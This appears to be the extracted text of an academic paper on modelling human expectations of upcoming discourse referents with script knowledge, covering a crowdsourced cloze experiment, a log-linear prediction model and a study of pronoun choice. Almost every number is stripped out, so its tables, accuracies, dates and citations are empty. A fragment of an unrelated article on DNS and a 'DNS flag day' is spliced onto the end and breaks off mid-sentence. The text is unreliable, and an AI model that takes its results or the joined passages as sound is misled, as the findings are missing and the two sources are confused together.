cloze task we use the inscript corpus to develop computa- tional models for the prediction of discourse refer- ents (drs) and to evaluate their prediction accuracy. this can be done by testing how often our models manage to reproduce the original discourse referent (cf. also the “narrative cloze” task by (chambers and jurafsky, ) which tests whether a verb together with a role can be correctly guessed by a model). however, we do not only want to predict the “cor- rect” drs in a text but also to model human expec- tation of drs in context. to empirically assess hu- man expectation, we created an additional database of crowdsourced human predictions of discourse ref- erents in context using amazon mechanical turk. the design of our experiment closely resembles the guessing game of (tily and piantadosi, ) but ex- tends it in a substantial way. workers had to read stories of the inscript corpus and guess upcoming participants: for each target np, workers were shown the story up to this np ex- cluding the np itself, and they were asked to guess the next person or object most likely to be referred to. in case they decided in favour of a discourse ref- erent already mentioned, they had to choose among the available discourse referents by clicking an np in the preceding text, i.e., some noun with a specific, coreference-indicating color; see figure . other- wise, they would click the “new” button, and would in turn be asked to give a short description of the new person or object they expected to be mentioned. the percentage of guesses that agree with the actually re- ferred entity was taken as a basis for estimating the surprisal. the experiment was done for all stories of the test set: stories ( %) of the inscript corpus, evenly taken from all scenarios. since our focus is on the effect of script knowledge, we only consid- ered those nps as targets that are direct dependents of script-related events. guessing started from the third sentence only in order to ensure that a mini- mum of context information was available. to keep the complexity of the context manageable, we re- stricted guessing to a maximum of targets and skipped the rest of the story (this applied to % of the stories). we collected guesses per np for noun phrase instances, which amounts to a to- tal of around k guesses. workers selected a con- the corpus is available at : http://www.sfb . uni-saarland.de/?page_id= http://www.sfb .uni-saarland.de/?page_id= http://www.sfb .uni-saarland.de/?page_id= text np in % of cases and “new” in % of cases. our leading hypothesis is that script knowledge substantially influences human expectation of dis- course referents. the guessing experiment provides a basis to estimate human expectation of already mentioned drs (the number of clicks on the respec- tive nps in text). however, we expect that script knowledge has a particularly strong influence in the case of first mentions. once a script is evoked in a text, we assume that the full script structure, includ- ing all participants, is activated and available to the reader. tily and piantadosi ( ) are interested in sec- ond mentions only and therefore do not make use of the worker-generated noun phrases classified as “new”. to study the effect of activated but not explicitly mentioned participants, we carried out a subsequent annotation step on the worker-generated noun phrases classified as “new”. we presented an- notators with these noun phrases in their contexts (with co-referring nps marked by color, as in the m- turk experiment) and, in addition, displayed all par- ticipant types of the relevant script (i.e., the script as- sociated with the text in the inscript corpus). anno- tators did not see the “correct” target np. we asked annotators to either ( ) select the participant type in- stantiated by the np (if any), ( ) label the np as un- related to the script, or ( ), link the np to an overt antecedent in the text, in the case that the np is ac- tually a second mention that had been erroneously labeled as new by the worker. option ( ) provides a basis for a fine-grained estimation of first-mention drs. option ( ), which we added when we noticed the considerable number of overlooked antecedents, serves as correction of the results of the m-turk ex- periment. out of the k annotated “new” cases, % were identified as second mentions, % were linked to a participant type, and % were classified as really novel. referent prediction model in this section, we describe the model we use to predict upcoming discourse referents (drs). . model our model should not only assign probabilities to drs already explicitly introduced in the preced- ing text fragment (e.g., “bath” or “bathroom” for the cloze task in figure ) but also reserve some prob- ability mass for ‘new’ drs, i.e., drs activated via the script context or completely novel ones not be- longing to the script. in principle, different variants of the activation mechanism must be distinguished. for many participant types, a single participant be- longing to a specific semantic class is expected (re- ferred to with the bathtub or the soap). in contrast, the “towel’ participant type may activate a set of ob- jects, elements of which then can be referred to with a towel or another towel. the “bath means” partici- pant type may even activate a group of drs belong- ing to different semantic classes (e.g., bubble bath and salts). since it is not feasible to enumerate all potential participants, for ‘new’ drs we only pre- dict their participant type (“bath means” in our ex- ample). in other words, the number of categories in our model is equal to the number of previously introduced drs plus the number of participant types of the script plus , reserved for a new dr not corre- sponding to any script participant (e.g., cellphone). in what follows, we slightly abuse the terminology and refer to all these categories as discourse refer- ents. unlike standard co-reference models, which pre- dict co-reference chains relying on the entire docu- ment, our model is incremental, that is, when pre- dicting a discourse referent d(t) at a given position t, it can look only in the history h(t) (i.e., the pre- ceding part of the document), excluding the refer- ring expression (re) for the predicted dr. we also assume that past res are correctly resolved and as- signed to correct participant types (pts). typical nlp applications use automatic coreference reso- lution systems, but since we want to model human behavior, this might be inappropriate, since an au- tomated system would underestimate human perfor- mance. this may be a strong assumption, but for reasons explained above, we use gold standard past res. we use the following log-linear model (“softmax regression”): p(d(t) = d|h(t)) = exp(w t f(d,h(t)))∑ d′ exp(w t f(d′,h(t))) , where f is the feature function we will discuss in the following subsection, w are model parameters, and the summation in the denominator is over the feature type recency shallow linguistic frequency shallow linguistic grammatical function shallow linguistic previous subject shallow linguistic previous object shallow linguistic previous re type shallow linguistic selectional preferences linguistic participant type fit script predicate schemas script table : summary of feature types set of categories described above. some of the features included in f are a func- tion of the predicate syntactically governing the unobservable target re (corresponding to the dr being predicted). however, in our incremental setting, the predicate is not available in the his- tory h(t) for subject nps. in this case, we use an additional probabilistic model, which esti- mates the probability of the predicate v given the context h(t), and marginalize out its predictions: p(d(t) =d|h(t))= ∑ v p(v|h(t)) exp(w t f(d,h(t),v))∑ d′ exp(w t f(d′,h(t),v)) the predicate probabilities p(v|h(t)) are computed based on the sequence of preceding predicates (i.e., ignoring any other words) using the recurrent neural network language model estimated on our training set. the expression f(d,h(t),v) denotes the feature function computed for the referent d, given the history composed of h(t) and the predicate v. . features our features encode properties of a dr as well as characterize its compatibility with the context. we face two challenges when designing our fea- tures. first, although the sizes of our datasets are respectable from the script annotation perspective, they are too small to learn a richly parameterized model. for many of our features, we address this challenge by using external word embeddings and associate parameters with some simple similarity measures computed using these embeddings. con- we used rnnlm toolkit (mikolov et al., ; mikolov et al., ) with default settings. we use -dimensional word embeddings estimated on wikipedia with the skip-gram model of mikolov et al. ( ): https://code.google.com/p/word vec/ sequently, there are only a few dozen parameters which need to be estimated from scenario-specific data. second, in order to test our hypothesis that script information is beneficial for the dr prediction task, we need to disentangle the influence of script information from general linguistic knowledge. we address this by carefully splitting the features apart, even if it prevents us from modeling some interplay between the sources of information. we will de- scribe both classes of features below; also see a sum- mary in table . . . shallow linguistic features these features are based on tily and pianta- dosi ( ). in addition, we consider a selectional preference feature. recency feature. this feature captures the distance lt(d) between the position t and the last occurrence of the candidate dr d. as a distance measure, we use the number of sentences from the last mention and exponentiate this number to make the depen- dence more extreme; only very recent drs will re- ceive a noticeable weight: exp(−lt(d)). this feature is set to for new drs. frequency. the frequency feature indicates the number of times the candidate discourse referent d has been mentioned so far. we do not perform any bucketing. grammatical function. this feature encodes the dependency relation assigned to the head word of the last mention of the dr or a special none label if the dr is new. previous subject indicator. this binary feature in- dicates whether the candidate dr d is coreferential with the subject of the previous verbal predicate. previous object indicator. the same but for the ob- ject position. previous re type. this three-valued feature indi- cates whether the previous mention of the candidate dr d is a pronoun, a non-pronominal noun phrase, or has never been observed before. . . selectional preferences feature the selectional preference feature captures how well the candidate dr d fits a given syntactic po- sition r of a given verbal predicate v. it is com- puted as the cosine similarity simcos(xtd ,xv,r) of a vector-space representation of the dr xd and a structured vector-space representation of the pred- https://code.google.com/p/word vec/ icate xv,r. the similarities are calculated using a distributional memory approach similar to that of baroni and lenci ( ). their structured vector space representation has been shown to work well on tasks that evaluate correlation with human the- matic fit estimates (baroni and lenci, ; baroni et al., ; sayeed et al., ) and is thus suited to our task. the representation xd is computed as an aver- age of head word representations of all the previ- ous mentions of dr d, where the word vectors are obtained from the typedm model of baroni and lenci ( ). this is a count-based, third-order co- occurrence tensor whose indices are a word w , a second word w , and a complex syntactic relation r, which is used as a stand-in for a semantic link. the values for each (w ,r,w ) cell of the tensor are the local mutual information (lmi) estimates obtained from a dependency-parsed combination of large cor- pora (ukwac, bnc, and wikipedia). our procedure has some differences with that of baroni and lenci. for example, for estimating the fit of an alternative new dr (in other words, xd based on no previous mentions), we use an aver- age over head words of all res in the training set, a “null referent.” xv,r is calculated as the average of the top (by lmi) r-fillers for v in typedm; in other words, the prototypical instrument of rub may be represented by summing vectors like towel, soap, eraser, coin. . . if the predicate has not yet been en- countered (as for subject positions), scores for all scenario-relevant verbs are emitted for marginaliza- tion. . . script features in this section, we describe features which rely on script information. our goal will be to show that such common-sense information is beneficial in per- forming dr prediction. we consider only two script features. participant type fit this feature characterizes how well the participant type (pt) of the candidate dr d fits a specific syn- tactic role r of the governing predicate v; it can be regarded as a generalization of the selectional prefer- ence feature to participant types and also its special- isation to the considered scenario. given the candi- date dr d, its participant type p, and the syntactic (i)( ) decided to take a (bath)( ) yesterday afternoon after working out . (i)( ) was getting ready to go out and needed to get cleaned before (i)( ) went so (i)( ) decided to take a (bath)( ). (i)( ) filled the (bath- tub)( ) with warm (water)( ) and added some (bub- ble bath)( ). (i)( ) got undressed and stepped into the (water)( ). (i)( ) grabbed the (soap)( ) and rubbed it on (my)( ) (body)( ) and rinsed xxxxxx figure : an example of the referent cloze task. similar to the mechanical turk experiment (figure ), our refer- ent prediction model is asked to guess the upcoming dr. relation r, we collect all the predicates in the train- ing set which have the participant type p in the posi- tion r. the embedding of the dr xp,r is given by the average embedding of these predicates. the feature is computed as the dot product of xp,r and the word embedding of the predicate v. predicate schemas the following feature captures a specific aspect of knowledge about prototypical sequences of events. this knowledge is called predicate schemas in the recent co-reference modeling work of peng et al. ( ). in predicate schemas, the goal is to model pairs of events such that if a dr d participated in the first event (in a specific role), it is likely to partici- pate in the second event (again, in a specific role). for example, in the restaurant scenario, if one ob- serves a phrase john ordered, one is likely to see john waited somewhere later in the document. spe- cific arguments are not that important (where it is john or some other dr), what is important is that the argument is reused across the predicates. this would correspond to the rule x-subject-of-order → x-subject-of-eat. unlike the previous work, our dataset is small, so we cannot induce these rules di- rectly as there will be very few rules, and the model would not generalize to new data well enough. in- stead, we again encode this intuition using similari- ties in the real-valued embedding space. recall that our goal is to compute a feature ϕ(d,h(t)) indicating how likely a potential dr d is to follow, given the history h(t). for example, imag- in this work, we limit ourselves to rules where the syntactic function is the same on both sides of the rule. in other words, we can, in principle, encode the pattern x pushed y → x apologized but not the pattern x pushed y → y cried. model name feature types features base shallow linguistic features recency, frequency, grammatical function, previous subject, previous object linguistic shallow linguistic features + linguistic feature recency, frequency, grammatical function, previous subject, previous object + selectional preferences script shallow linguistic features + linguistic feature + script features recency, frequency, grammatical function, previous subject, previous object + selectional preferences + participant type fit, predicate schemas table : summary of model features ine that the model is asked to predict the dr marked by xxxxxx in figure . predicate-schema rules can only yield previously introduced drs, so the score ϕ(d,h(t)) = for any new dr d. let us use “soap” as an example of a previously introduced dr and see how the feature is computed. in order to choose which inference rules can be applied to yield “soap”, we can inspect figure . there are only two preceding predicates which have dr “soap” as their object (rubbed and grabbed), resulting in two poten- tial rules x-object-of-grabbed → x-object-of-rinsed and x-object-of-rubbed → x-object-of-rinsed. we define the score ϕ(d,h(t)) as the average of the rule scores. more formally, we can write ϕ(d,h(t))= |n(d,h(t))| ∑ (u,v,r)∈n(d,h(t)) ψ(u,v,r), ( ) where ψ(u,v,r) is the score for a rule x-r-of-u → x-r-of-v, n(d,h(t)) is the set of applicable rules, and |n(d,h(t))| denotes its cardinality. we define ϕ(d,h(t)) as , when the set of applicable rules is empty (i.e. |n(d,h(t))| = ). the scoring function ψ(u,v,r) as a linear func- in all our experiments, rather than considering all potential predicates in the history to instantiate rules, we take into ac- count only preceding verbs. in other words, u and v can be interleaved by at most one verb and |n(d, h(t))| is in { , , }. tion of a joint embedding xu,v of verbs u and v: ψ(u,v,r) = αtr xu,v. the two remaining questions are ( ) how to define the joint embeddings xu,v, and ( ) how to estimate the parameter vector αr. the joint embedding of two predicates, xu,v, can, in principle, be any composi- tion function of embeddings of u and v, for example their sum or component-wise product. inspired by bordes et al. ( ), we use the difference between the word embeddings: ψ(u,v,r) = αtr (xu −xv), where xu and xv are external embeddings of the corresponding verbs. encoding the succession re- lation as translation in the embedding space has one desirable property: the scoring function will be largely agnostic to the morphological form of the predicates. for example, the difference between the embeddings of rinsed and rubbed is very sim- ilar to that of rinse and rub (botha and blunsom, ), so the corresponding rules will receive simi- lar scores. now, we can rewrite the equation ( ) as ϕ(d,h(t))= αt r(h(t)) ∑ (u,v,r)∈n(d,h(t)) (xu −xv) |n(d,h(t))| ( ) where r(h(t)) denotes the syntactic function corre- sponding to the dr being predicted (object in our example). as for the parameter vector αr, there are again a number of potential ways how it can be estimated. for example, one can train a discriminative classifier to estimate the parameters. however, we opted for a simpler approach—we set it equal to the empirical estimate of the expected feature vector xu,v on the training set: αr = dr ∑ l,t δr(r(h (l,t))) ∑ (u,v,r′)∈n(d(l,t),h(l,t)) (xu −xv), ( ) where l refers to a document in the training set, t is (as before) a position in the document, h(l,t) and this essentially corresponds to using the naive bayes model with the simplistic assumption that the score differences are normally distributed with spherical covariance matrices. scenario human model script model linguistic model tily model accuracy perplexity accuracy perplexity accuracy perplexity accuracy perplexity grocery shopping . . . . . . . . repairing a flat bicycle tyre . . . . . . . . riding a public bus . . . . . . . . getting a haircut . . . . . . . . planting a tree . . . . . . . . borrowing book from library . . . . . . . . taking bath . . . . . . . . going on a train . . . . . . . . baking a cake . . . . . . . . flying in an airplane . . . . . . . . average . . . . . . . . table : accuracies (in %) and perplexities for different models and scenarios. the script model substantially out- performs linguistic and base models (with p < . , significance tested with mcnemar’s test (everitt, )). as expected, the human prediction model outperforms the script model (with p < . , significance tested by mcne- mar’s test). model accuracy perplexity linguistic model . . linguistic model + predicate schemas . . linguistic model + participant type fit . . full script model (both features) . . table : accuracies from ablation experiments. d(l,t) are the history and the correct dr for this posi- tion, respectively. the term δr(r′) is the kronecker delta which equals if r = r′ and , otherwise. dr is the total number of rules for the syntactic function r in the training set: dr = ∑ l,t δr(r(h (l,t)))×|n(d(l,t),h(l,t))|. let us illustrate the computation with an example. imagine that our training set consists of the docu- ment in figure , and the trained model is used to predict the upcoming dr in our referent cloze exam- ple (figure ). the training document includes the pair x-object-of-scrubbed → x-object-of-rinsing, so the corresponding term (xscrubbed - xrinsing) partici- pates in the summation ( ) for αobj. as we rely on external embeddings, which encode semantic simi- larities between lexical items, the dot product of this term and (xrubbed - xrinsed) will be high. conse- quently, ϕ(d,h(t)) is expected to be positive for d = “soap”, thus, predicting “soap” as the likely forth- coming dr. unfortunately, there are other terms (xu − xv) both in expression ( ) for αobj and in expression ( ) for ϕ(d,h(t)). these terms may be the score would have been even higher, should the pred- icate be in the morphological form rinsing rather than rinsed. however, embeddings of rinsing and rinsed would still be suf- ficiently close to each other for our argument to hold. irrelevant to the current prediction, as x-object-of- plugged → x-object-of-filling from figure , and may not even encode any valid regularities, as x- object-of-got → x-object-of-scrubbed (again from figure ). this may suggest that our feature will be too contaminated with noise to be informative for making predictions. however, recall that inde- pendent random vectors in high dimensions are al- most orthogonal, and, assuming they are bounded, their dot products are close to zero. consequently, the products of the relevant (“non-random”) terms, in our example (xscrubbed - xrinsing) and (xrubbed - xrinsed), are likely to overcome the (“random”) noise. as we will see in the ablation studies, the predicate- schema feature is indeed predictive of a dr and con- tributes to the performance of the full model. . experiments we would like to test whether our model can pro- duce accurate predictions and whether the model’s guesses correlate well with human predictions for the referent cloze task. in order to be able to evaluate the effect of script knowledge on referent predictability, we compare three models: our full script model uses all of the features introduced in section . ; the linguistic model relies only on the ‘linguistic features’ but not the script-specific ones; and the base model includes all the shallow linguistic features. the base model differs from the linguistic model in that it does not model selectional preferences. table summarizes features used in different models. the data set was randomly divided into training ( %), development ( %, stories from sce- narios), and test ( %, stories from scenar- ios) sets. the feature weights were learned using l-bfgs (byrd et al., ) to optimize the log- likelihood. evaluation against original referents. we calcu- lated the percentage of correct dr predictions. see table for the averages across scenarios. we can see that the task appears hard for humans: their average performance reaches only % accuracy. as expected, the base model is the weakest system (the accuracy of %). modeling selectional pref- erences yields an extra % in accuracy (linguis- tic model). the key finding is that incorporation of script knowledge increases the accuracy by further %, although still far behind human performance ( % vs. %). besides accuracy, we use perplex- ity, which we computed not only for all our models but also for human predictions. this was possible as each task was solved by multiple humans. we used unsmoothed normalized guess frequencies as the probabilities. as we can see from table , the perplexity scores are consistent with the accuracies: the script model again outperforms other methods, and, as expected, all the models are weaker than hu- mans. as we used two sets of script features, capturing different aspects of script knowledge, we performed extra ablation studies (table ). the experiments confirm that both feature sets were beneficial. evaluation against human expectations. in the previous subsection, we demonstrated that the in- corporation of selectional preferences and, perhaps more interestingly, the integration of automatically acquired script knowledge lead to improved accu- racy in predicting discourse referents. now we turn to another question raised in the introduction: does incorporation of this knowledge make our predic- tions more human-like? in other words, are we able to accurately estimate human expectations? this in- cludes not only being sufficiently accurate but also making the same kind of incorrect predictions. in this evaluation, we therefore use human guesses collected during the referent cloze task as our target. we then calculate the relative accuracy of each computational model. as can be seen in figure , the script model, at approx. % accuracy, is a lot more accurate in predicting human guesses than the linguistic model and the base model. we can also script linguistic base . . . r e l. a cc u ra cy ( in % ) figure : average relative accuracies of different models w.r.t human predictions. script linguistic base . . . . . . . . js d iv e rg e n ce figure : average jensen-shannon divergence between human predictions and models. observe that the margin between the script model and the linguistic model is a lot larger in this evalu- ation than between the base model and the linguis- tic model. this indicates that the model which has access to script knowledge is much more similar to human prediction behavior in terms of top guesses than the script-agnostic models. now we would like to assess if our predictions are similar as distributions rather than only yield- ing similar top predictions. in order to compare the distributions, we use the jensen-shannon divergence (jsd), a symmetrized version of the kullback- leibler divergence. intuitively, jsd measures the distance between two probability distributions. a smaller jsd value is indicative of more similar distributions. fig- ure shows that the probability distributions result- ing from the script model are more similar to human predictions than those of the linguistic and base models. in these experiments, we have shown that script knowledge improves predictions of upcoming ref- erents and that the script model is the best among our models in approximating human referent predic- tions. referring expression type prediction model (re model) using the referent prediction models, we next at- tempt to replicate tily and piantadosi’s findings that the choice of the type of referring expression (pro- noun or full np) depends in part on the predictability of the referent. . uniform information density hypothesis the uniform information density (uid) hypothe- sis suggests that speakers tend to convey information at a uniform rate (jaeger, ). applied to choice of referring expression type, it would predict that a highly predictable referent should be encoded us- ing a short code (here: a pronoun), while an unpre- dictable referent should be encoded using a longer form (here: a full np). information density is mea- sured using the information-theoretic measure of the surprisal s of a message mi: s(mi) = − log p(mi | context) uid has been very successful in explaining a vari- ety of linguistic phenomena; see jaeger et al. ( ). there is, however, controversy about whether uid affects pronominalization. tily and piantadosi ( ) report evidence that writers are more likely to refer using a pronoun or proper name when the ref- erent is easy to guess and use a full np when readers have less certainty about the upcoming referent; see also arnold ( ). but other experiments (using highly controlled stimuli) have failed to find an ef- fect of predictability on pronominalization (steven- son et al., ; fukumura and van gompel, ; rohde and kehler, ). the present study hence contributes to the debate on whether uid affects re- ferring expression choice. . a model of referring expression choice our goal is to determine whether referent pre- dictability (quantified in terms of surprisal) is cor- related with the type of referring expression used in the text. here we focus on the distinction be- tween pronouns and full noun phrases. our data also contains a small percentage (ca. %) of proper names (like “john”). due to this small class size and earlier findings that proper nouns behave much like pronouns (tily and piantadosi, ), we com- bined pronouns and proper names into a single class of short encodings. for the referring expression type prediction task, we estimate the surprisal of the referent from each of our computational models from section as well as the human cloze task. the surprisal of an upcoming discourse referent d(t) based on the previous context h(t) is thereby estimated as: s(d(t)) = − log p(d(t) | h(t)) in order to determine whether referent predictability has an effect on referring expression type over and above other factors that are known to affect the choice of referring expression, we train a logistic regression model with referring expression type as a response variable and discourse referent predictabil- ity as well as a large set of other linguistic factors (based on tily and piantadosi, ) as explanatory variables. the model is defined as follows: p(n(t) = n|d(t),h(t)) = exp(v t g(n,dt,h(t)))∑ n′ exp(v t g(n′,dt,h(t))) , where d(t) and h(t) are defined as before, g is the feature function, and v is the vector of model pa- rameters. the summation in the denominator is over np types (full np vs. pronoun/proper noun). . re model experiments we ran four different logistic regression models. these models all contained exactly the same set of linguistic predictors but differed in the estimates used for referent type surprisal and residual entropy. one logistic regression model used surprisal esti- mates based on the human referent cloze task, while the three other models used estimates based on the three computational models (base, linguistic and script). for our experiment, we are interested in the choice of referring expression type for those occur- rences of references, where a “real choice” is possi- ble. we therefore exclude for our analysis reported below all first mentions as well as all first and second person pronouns (because there is no optionality in how to refer to first or second person). this subset contains data points. . results the results of all four logistic regression models are shown in table . we first take a look at the results for the linguistic features. while there is a bit of variability in terms of the exact coefficient es- timates between the models (this is simply due to small correlations between these predictors and the predictors for surprisal), the effect of all of these features is largely consistent across models. for in- stance, the positive coefficients for the recency fea- ture means that when a previous mention happened estimate std. error pr(>| z |) human script linguistic base human script linguistic base human script linguistic base (intercept) - . - . - . - . . . . . < e- *** < e- *** < e- *** . *** recency . . . . . . . . < e- *** < e- *** < e- *** < e- *** frequency . . . . . . . . . . . . pastobj . . . . . . . . . . . . pastsubj - . - . - . - . . . . . . . . . . . pastexppronoun . . . . . . . . . e- *** . e- *** . e- *** . e- *** deptypesubj . . . . . . . . < e- *** < e- *** . e- *** . * deptypeobj . . . . . . . . . e- *** . e- *** . * . surprisal - . - . . - . . . . . . . . . residualentropy - . . - . - . . . . . . . . . table : coefficients obtained from regression analysis for different models. two np types considered: full np and pronoun/propernoun, with base class full np. significance: ‘***’ < . , ‘**’ < . , ‘*’ < . , and ‘.’ < . . very recently, the referring expression is more likely to be a pronoun (and not a full np). the coefficients for the surprisal estimates of the different models are, however, not significantly dif- ferent from zero. model comparison shows that they do not improve model fit. we also used the esti- mated models to predict referring expression type on new data and again found that surprisal estimates from the models did not improve prediction accu- racy. this effect even holds for our human cloze data. hence, it cannot be interpreted as a problem with the models—even human predictability esti- mates are, for this dataset, not predictive of referring expression type. we also calculated regression models for the full dataset including first and second person pronouns as well as first mentions ( data points). the re- sults for the full dataset are fully consistent with the findings shown in table : there was no significant effect of surprisal on referring expression type. this result contrasts with the findings by tily and piantadosi ( ), who reported a significant effect of surprisal on re type for their data. in order to replicate their settings as closely as possible, we also included residualentropy as a predictor in our model (see last predictor in table ); however, this did not change the results. discussion and future work our study on incrementally predicting discourse referents showed that script knowledge is a highly important factor in determining human discourse ex- pectations. crucially, the computational modelling approach allowed us to tease apart the different fac- tors that affect human prediction as we cannot ma- nipulate this in humans directly (by asking them to “switch off” their common-sense knowledge). by modelling common-sense knowledge in terms of event sequences and event participants, our model captures many more long-range dependencies than normal language models. the script knowledge is automatically induced by our model from crowd- sourced scenario-specific text collections. in a second study, we set out to test the hypoth- esis that uniform information density affects refer- ring expression type. this question is highly con- troversial in the literature: while tily and piantadosi ( ) find a significant effect of surprisal on refer- ring expression type in a corpus study very similar to ours, other studies that use a more tightly con- trolled experimental approach have not found an ef- fect of predictability on re type (stevenson et al., ; fukumura and van gompel, ; rohde and kehler, ). the present study, while replicating exactly the setting of t&p in terms of features and analysis, did not find support for a uid effect on re type. the difference in results between t&p and our results could be due to the different corpora and text sorts that were used; specifically, we would expect that larger predictability effects might be ob- servable at script boundaries, rather than within a script, as is the case in our stories. a next step in moving our participant predic- tion model towards nlp applications would be to replicate our modelling results on automatic text- to-script mapping instead of gold-standard data as done here (in order to approximate human level of processing). furthermore, we aim to move to more complex text types that include reference to several scripts. we plan to consider the recently published roc stories corpus (mostafazadeh et al., ), a large crowdsourced collection of topically unre- stricted short and simple narratives, as a basis for these next steps in our research. acknowledgments we thank the editors and the anonymous review- ers for their insightful suggestions. we would like to thank florian pusse for helping with the ama- zon mechanical turk experiment. we would also like to thank simon ostermann and tatjana anikina for helping with the inscript corpus. this research was partially supported by the german research foundation (dfg) as part of sfb ‘informa- tion density and linguistic encoding’, european research council (erc) as part of erc starting grant broadsem (# ), the dutch national sci- ence foundation as part of nwo vidi . . , and the dfg once again as part of the mmci cluster of excellence (exc ). references simon ahrendt and vera demberg. . improving event prediction by representing script participants. in proceedings of naacl-hlt. jennifer e. arnold. . the effect of thematic roles on pronoun use and frequency of reference continuation. discourse processes, ( ): – . marco baroni and alessandro lenci. . distribu- tional memory: a general framework for corpus-based semantics. computational linguistics, ( ): – . marco baroni, georgiana dinu, and germán kruszewski. . don’t count, predict! a systematic compari- son of context-counting vs. context-predicting seman- tic vectors. in proceedings of acl. antoine bordes, nicolas usunier, alberto garcia-duran, jason weston, and oksana yakhnenko. . trans- lating embeddings for modeling multi-relational data. in proceedings of nips. jan a. botha and phil blunsom. . compositional morphology for word representations and language modelling. in proceedings of icml. richard h. byrd, peihuang lu, jorge nocedal, and ciyou zhu. . a limited memory algorithm for bound constrained optimization. siam journal on scientific computing, ( ): – . nathanael chambers and daniel jurafsky. . unsu- pervised learning of narrative event chains. in pro- ceedings of acl. nathanael chambers and dan jurafsky. . unsuper- vised learning of narrative schemas and their partici- pants. in proceedings of acl. brian s. everitt. . the analysis of contingency ta- bles. crc press. lea frermann, ivan titov, and manfred pinkal. . a hierarchical bayesian model for unsupervised induc- tion of script knowledge. in proceedings of eacl. kumiko fukumura and roger p. g. van gompel. . choosing anaphoric expressions: do people take into account likelihood of reference? journal of memory and language, ( ): – . t. florian jaeger, esteban buz, eva m. fernandez, and helen s. cairns. . signal reduction and linguis- tic encoding. handbook of psycholinguistics. wiley- blackwell. t. florian jaeger. . redundancy and reduction: speakers manage syntactic information density. cog- nitive psychology, ( ): – . bram jans, steven bethard, ivan vulić, and marie francine moens. . skip n-grams and ranking functions for predicting script events. in proceedings of eacl. gina r. kuperberg and t. florian jaeger. . what do we mean by prediction in language comprehension? language, cognition and neuroscience, ( ): – . gina r. kuperberg. . separate streams or proba- bilistic inference? what the n can tell us about the comprehension of events. language, cognition and neuroscience, ( ): – . marta kutas, katherine a. delong, and nathaniel j. smith. . a look around at what lies ahead: pre- diction and predictability in language processing. pre- dictions in the brain: using our past to generate a fu- ture. tomas mikolov, martin karafiát, lukas burget, jan cer- nockỳ, and sanjeev khudanpur. . recurrent neu- ral network based language model. in proceedings of interspeech. tomas mikolov, stefan kombrink, anoop deoras, lukar burget, and jan cernocky. . rnnlm-recurrent neural network language modeling toolkit. in pro- ceedings of the asru workshop. tomas mikolov, ilya sutskever, kai chen, greg s. cor- rado, and jeff dean. . distributed representations of words and phrases and their compositionality. in proceedings of nips. ashutosh modi and ivan titov. . inducing neural models of script knowledge. proceedings of conll. ashutosh modi, tatjana anikina, simon ostermann, and manfred pinkal. . inscript: narrative texts anno- tated with script information. proceedings of lrec. ashutosh modi. . event embeddings for semantic script modeling. proceedings of conll. nasrin mostafazadeh, nathanael chambers, xiaodong he, devi parikh, dhruv batra, lucy vanderwende, pushmeet kohli, and james allen. . a corpus and cloze evaluation for deeper understanding of com- monsense stories. proceedings of naacl. haoruo peng, daniel khashabi, and dan roth. . solving hard coreference problems. in proceedings of naacl. karl pichotta and raymond j mooney. . statistical script learning with multi-argument events. proceed- ings of eacl. altaf rahman and vincent ng. . resolving com- plex cases of definite pronouns: the winograd schema challenge. in proceedings of emnlp. michaela regneri, alexander koller, and manfred pinkal. . learning script knowledge with web experiments. in proceedings of acl. hannah rohde and andrew kehler. . grammati- cal and information-structural influences on pronoun production. language, cognition and neuroscience, ( ): – . rachel rudinger, vera demberg, ashutosh modi, ben- jamin van durme, and manfred pinkal. . learn- ing to predict script events from domain-specific text. proceedings of the international conference on lexi- cal and computational semantics (*sem ). asad sayeed, clayton greenberg, and vera demberg. . thematic fit evaluation: an aspect of selectional preferences. in proceedings of the workshop on eval- uating vector space representations for nlp (repe- val ). roger c. schank and robert p. abelson. . scripts, plans, goals, and understanding. lawrence erlbaum associates, potomac, maryland. simone schütz-bosbach and wolfgang prinz. . prospective coding in event representation. cognitive processing, ( ): – . rosemary j. stevenson, rosalind a. crawley, and david kleinman. . thematic roles, focus and the rep- resentation of events. language and cognitive pro- cesses, ( ): – . harry tily and steven piantadosi. . refer effi- ciently: use less informative expressions for more pre- dictable meanings. in proceedings of the workshop on the production of referring expressions: bridging the gap between computational and empirical approaches to reference. alessandra zarcone, marten van schijndel, jorrig vo- gels, and vera demberg. . salience and atten- tion in surprisal-based accounts of language process- ing. frontiers in psychology, : . doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , global internet come into a new dns era mou chengjin research center of international strategic, china mobile communication federation software evaluation center of national information center e-mail: mcjzp @ .com abstract—dns, short for domain name system, is an analytic central system, which transfers domain names into ip addresses that can be identified by the internet. dns has internal traits within it to conduct commands and regulations in network communication, as well as centralized ones that are inherently political. unlike other internet protocols, dns protocols penetrate the application layer, the internet layer, the transport layer, and provide even more complicated, tailored low-level software that are feasible to the dns, ranging from authorized domain name servers to recursive domain name servers, a domain system based content distribution network (dn-cdn), whether private or public, inside or outside the network, it must be dependent on the service provided by domain name system (dns). dns includes the increase in client subnet in dns extension mechanism (edns) to conduct more accurate matches to push service. keyword-dns; edns; sdn; ipv ; tld i. important landmark events a. dns “execution day” knowledge of obsolescent, wrong, or inappropriate methods to conduct software work around is required when we need to go on dns software updating or programming. some workarounds pertain to dns software have made it a deeper and refined situation for the us to control and inaugurate domain name system, unavoidably there are functional declination and an increase in unpredictable errors and safety risks. consequently, reinforcement in domain name system becomes inevitable. the internet engineering task force (ietf) proposed the implementation of dns domain name system extension mechanism (edns) in . in march , the us department of commerce’s national telecommunications and information administration (ntia), internet corporation for assigned names and numbers (icann) and verisign, a company that provides intelligent information infrastructure services which was established in the united states, led to the completion of the domain name root zone key (ksk) replacement plan as domain name root zone managers. on october , , icann finished the first global domain name root zone key (ksk) rollover in the history of the internet and announced there will be rollover every year. professionals claimed that ksk is a unified “re-keying”, followed by “dns execution day” being unified “lock and hinge updating”, they interlock with each other, laying codes systematically. in may , the internet’s worldwide regional regulatory agencies (rir) announced officially that february , would be the “dns flag day”. according to the official notifications from regional internet authorities and the joint alert of the internet community, non-compliant domain name servers will identified as “dead” from the “execution day” and beyond, which will make inroads on the access of related websites. domain name servers are mainly authoritative domain name servers and recursive domain name international journal of advanced network, monitoring and controls volume , no. , servers oriented. compliance is a “workaround” to dispense with or delete dns software by updating software version, and to identify or support the domain name system extension mechanism (edns) by software defined interconnection (sdn). edns is implemented by the standard rfc released by the internet engineering task force (ietf) in . the application of dns protocols on the internet has a history of more than years. it is the first time in the history of the internet of the “execution day” to maintain dns protocols and update dns software versions together globally, indicating the dns into a new beginning, a 